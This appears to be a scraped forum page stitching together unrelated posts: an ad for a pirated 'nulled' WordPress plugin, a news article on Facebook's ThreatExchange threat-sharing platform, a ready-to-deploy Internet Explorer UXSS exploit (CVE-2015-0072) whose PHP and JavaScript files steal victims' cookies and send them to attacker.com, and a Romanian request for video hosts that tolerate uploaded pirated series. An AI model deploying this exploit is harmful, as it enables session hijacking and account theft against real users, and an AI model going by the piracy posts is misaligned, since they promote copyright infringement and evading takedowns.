Search the Community

Download fo free Easy Social Share Buttons for WordPress Nulled, solution that allows you share, monitor and increase your social popularity. With Easy Social Share Buttons for WordPress you will take your social sharing and following on a next level. Download

Facebook, with its giant infrastructure and its equally wide view into Internet attacks, has built an information-sharing platform that it hopes will entice other big technology companies to join and contribute threat data and indicators of compromise. The platform, called ThreatExchange, already counts Pinterest, Yahoo, Tumblr, Twitter, Bitly and Dropbox among its early members. The cost is free, and most of the heavy lifting is done by Facebook’s infrastructure. The platform developers were also cognizant of some of the concerns enterprises have about sharing threat data, from both a competitive and risk management standpoint. Privacy controls are built in to ThreatExchange that not only sanitize information provided by members, but also allows contributors to share data with all of the exchange’s members, or only particular subsets. In addition to threat information shared by contributors, open source threat intelligence feeds are pulled into the platform. Mark Hammell, manager of Facebook’s threat infrastructure team, would not identify any of the open source feeds until some legal machinations are worked out. Facebook will homogenize all of those respective feeds’ data formats and make them consumable via ThreatExchange. “We’re able to leverage a huge community doing security research independently and give them a platform,” Hammell said. Hammell said he hopes the initial partner list grows to include other technology companies with a large Internet footprint. Microsoft, for example, has developed its own information sharing platform called Interflow, while the FBI announced last winter that it was releasing an unclassified version of its malware repository in the hopes of spurring public-private sharing of threat data. “If some reasonably large Internet properties cooperate on attacks they’ve seen and responded to, the vast majority of the Internet will be safer,” Hammell said. “We want to bring in more companies like that and eventually broaden it beyond big companies to smaller web properties and researchers. We want to create a forum where we can share attack and threat information in an easy way and share it with as many who want to receive it. “We realize that any problem that affects the Internet affects our products in lockstep,” Hammell said. “The corollary there is that the more we can do to take on larger problems the Internet is facing, the better our products will be and the safer the Internet will be.” ThreatExchange is an API-based exchange; IT admins will be able to consume threat data via the APIs and write signatures and other protections accordingly. Participants can share threat data such as malware samples, lists of malicious URLs and other indicators of compromise that make sense. While participants will be able to see the data, the will not be able to tell where it’s coming from, though everyone will have access to list of members. “You can see URLs that are known as bad, or metadata, but you cannot tell where it’s coming from; there is no attribution in the data,” Hammell said. Privacy controls within the framework allow contributors to publish breach data such as domains used in an attack or malware hashes and select who sees it. Facebook said there was one added use case where a contributor is allowed to select only specific other organizations to share data with. “The classic example is an attack you’re investigating where only you and a few companies are targeted,” Hammell explained. “They can collaborate together on that particular attack and share data, but perhaps they don’t feel it’s appropriate to go wider because it may tip their hand and alert the attacker, or it would not be beneficial to the investigation if others started poking at the infrastructure and possibly disrupt the work they’re doing. It’s an important scenario to get right.” Hammell added that the platform is free, and the intent is for it to stay that way. “We want the platform to be a medium to share what people want to share,” he said. Sursa

Cookie hijacking: Internet Explorer UXSS (CVE-2015-0072) Host below files on webserver (attacker.com) and share the exploit link with victims, exploit.php --- exploit link (Share with victim) redirect.php --- Script to redirect on target page (target page should not contain X-Frame-Options or it will fail) delay.php --- Script to add delay collector.php --- Script to collect hijacked cookie log.txt --- Collected cookies will be stored in this text file -------------------------------------exploit.php----------------------------------- <iframe src="redirect.php" style="display:none"></iframe> <iframe src="https://target.com/" style="display:none"></iframe> <script> top[0].eval('_=top[1];with(new XMLHttpRequest)open("get","http://attacker.com/delay.php",false),send();_.location="javascript:bkp=\'http://attacker.com/collector.php?\'+document.cookie;alert(bkp);window.location(bkp);"'); </script> -------------------------------------------------------------------------------------- -------------------------------------redirect.php----------------------------------- <?php header("Location: https://target.com/"); exit(); ?> -------------------------------------------------------------------------------------- -------------------------------------delay.php----------------------------------- <?php sleep(15); echo 'Bhdresh'; exit(); ?> -------------------------------------------------------------------------------------- -------------------------------------collector.php----------------------------------- <?php $f = fopen("log.txt", 'a'); fwrite($f, $_SERVER["REQUEST_URI"]."\n"); fclose($f); header("Location: http://www.youtube.com/"); ?> -------------------------------------------------------------------------------------- -------------------------------------log.txt----------------------------------- - Create a file as log.txt and modify the permissions (chmod 777 log.txt) -------------------------------------------------------------------------------------- Demo: facabook.net16.net/exploit.php Reference: http://innerht.ml/blog/ie-uxss.html Source

Buna, de ceva vreme caut pagini unde pot urca materiale copyrighted (seriale), dar dupa cateva zile vad ca au fost sterse sau blocate. Daca e posibil sa imi oferiti cateva link-uri unde pot urca aceste materiale fie prin post sau prin PM, dar fara ca acestea sa fie sterse. Caut ceva bun si permanent sau de durata mai lunga (luni). Am gasit si eu cateva dar din 10 daca 1 e bun. Caut host video unde: 1. streaming-ul sa fie bunicel (load time-ul sa fie mai mic) 2. fara reclame 3. sa nu fie sters dupa (doar) cateva zile 4. dimensiunea maxima ce pot incarca sa fie de 500+ mb 5. sa nu piarda din calitate 6. dupa urcare sa o pot shareui mai departe (embed code) 7. sa nu am probleme cu legea Va multumesc !